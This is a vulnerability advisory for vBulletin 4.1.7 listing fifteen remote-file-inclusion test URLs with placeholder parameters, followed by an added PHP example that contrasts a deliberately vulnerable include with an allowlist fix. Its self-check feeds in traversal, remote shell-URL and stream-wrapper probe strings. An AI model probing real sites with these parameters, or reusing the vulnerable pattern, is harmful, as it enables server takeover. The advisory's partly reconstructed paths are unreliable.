Title: VBulletin 4.1.7 Multiple Remote File Inclusion Vulnerabilities
Time: 2011-11-05
Author: indoushka (indoushka@hotmail.com) www.2cto.com
############################################################################
Affected Versions:
VBulletin 4.1.7
Vulnerability description:
vBulletin is a powerful and flexible forum software suite that can be customized to your needs.
vBulletin 4.1.7 contains multiple Remote File Inclusion (RFI) vulnerabilities. An attacker can exploit them to read sensitive information or to execute arbitrary script code in the web server process, taking control of the application or the host.
Example test URLs (the affected parameter is shown with the placeholder [RFI]; the "includes" path segments are restored from the garbled translation):
http://www.bkjia.com/vB1/api.php?api_script=[RFI]
http://www.bkjia.com/vB1/payment_gateway.php?api[classname]=[RFI]
http://www.bkjia.com/vB1/admincp/cronadmin.php?nextitem[filename]=[RFI]
http://www.bkjia.com/vB1/admincp/diagnostic.php?match[0]=[RFI]
http://www.bkjia.com/vB1/admincp/diagnostic.php?api[classname]=[RFI]
http://www.bkjia.com/vB1/admincp/plugin.php?safeid=[RFI]
http://www.bkjia.com/vB1/includes/class_block.php?file=[RFI]
http://www.bkjia.com/vB1/includes/class_humanverify.php?chosenlib=[RFI]
http://www.bkjia.com/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[RFI]
http://www.bkjia.com/vB1/includes/functions.php?classfile=[RFI]
http://www.bkjia.com/vB1/includes/functions_cron.php?nextitem[filename]=[RFI]
http://www.bkjia.com/vB1/vb.php?filename=[RFI]
http://www.bkjia.com/vB1/install/includes/class_upgrade.php?chosenlib=[RFI]
http://www.bkjia.com/vB1/packages/vbattach/attach.php?package=[RFI]
http://www.bkjia.com/vB1/packages/vbattach/attach.php?path=[RFI]
Fix:
Filter the input reaching the affected pages before it is used in a file include.
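The advisory names the parameters but not the code behind them, so the following is an added illustration, not vBulletin's code: the generic "include a request-controlled path" pattern that produces an RFI, beside a hardened loader that maps the request value onto a fixed allowlist and confirms the resolved path stays inside the intended directory. The handler names, the directory layout and the probe strings are hypothetical. Note that fetching and executing a remote URL through include() requires PHP's allow_url_include directive to be enabled, but the same unchecked include still reaches local files through "../" sequences and stream wrappers when it is off, so the allowlist is the actual fix and the ini setting is only a second layer.

```php
<?php
// Added example (not vBulletin code): the remote-file-inclusion pattern the
// advisory describes, beside a hardened loader. Names and paths are hypothetical.

declare(strict_types=1);

// --- Vulnerable pattern: the include path is built straight from the request.
// With allow_url_include=On a value such as "http://.../x.txt" is fetched and
// executed; with it off, "../../" sequences and stream wrappers still reach
// local files. Shown only to contrast with the hardened version below.
function loadHandlerVulnerable(string $name): void
{
    include './includes/class_' . $name . '.php';   // user-controlled include path
}

// --- Hardened pattern: accept only known handler names, then verify that the
// resolved file really lives under the handler directory.
const ALLOWED_HANDLERS = ['paypal', 'authorizenet', 'nochex'];   // hypothetical

function resolveHandlerPath(string $name, string $handlerDir): ?string
{
    if (!in_array($name, ALLOWED_HANDLERS, true)) {
        return null;                      // unknown handler: refuse, never guess
    }
    $base      = realpath($handlerDir);
    $candidate = realpath($handlerDir . '/class_' . $name . '.php');
    if ($base === false || $candidate === false) {
        return null;                      // directory misconfigured or file missing
    }
    // realpath() has already removed "..", symlinks and wrapper prefixes;
    // still require the canonical path to start with the handler directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

function loadHandlerSafe(string $name, string $handlerDir): void
{
    $path = resolveHandlerPath($name, $handlerDir);
    if ($path === null) {
        http_response_code(400);
        exit('invalid handler');
    }
    require $path;
}

// Self-check with constructed inputs (run from the CLI: php rfi_guard.php).
// A throw-away handler directory is created so the legitimate case can resolve.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/rfi_guard_demo_' . getmypid();
    mkdir($dir, 0700);
    file_put_contents($dir . '/class_paypal.php', "<?php // stub handler\n");

    $probes = [
        'paypal',                               // legitimate handler name
        '../../etc/passwd',                     // directory traversal
        'http://example.invalid/shell.txt',     // remote URL
        'php://input',                          // stream wrapper
        "paypal\0",                             // embedded null byte
    ];
    foreach ($probes as $p) {
        $verdict = resolveHandlerPath($p, $dir) === null ? 'rejected' : 'allowed';
        printf("%-36s %s\n", addcslashes($p, "\0"), $verdict);
    }
    // Second layer: report whether remote includes are enabled at all.
    echo 'allow_url_include=', ini_get('allow_url_include') ?: '0', "\n";

    unlink($dir . '/class_paypal.php');
    rmdir($dir);
}
```

Only the first probe is allowed; every other value fails the allowlist before realpath() is even consulted, which is the property a reviewer should look for on each of the pages listed above: the request value selects from a closed set, it is never concatenated into the include path as-is.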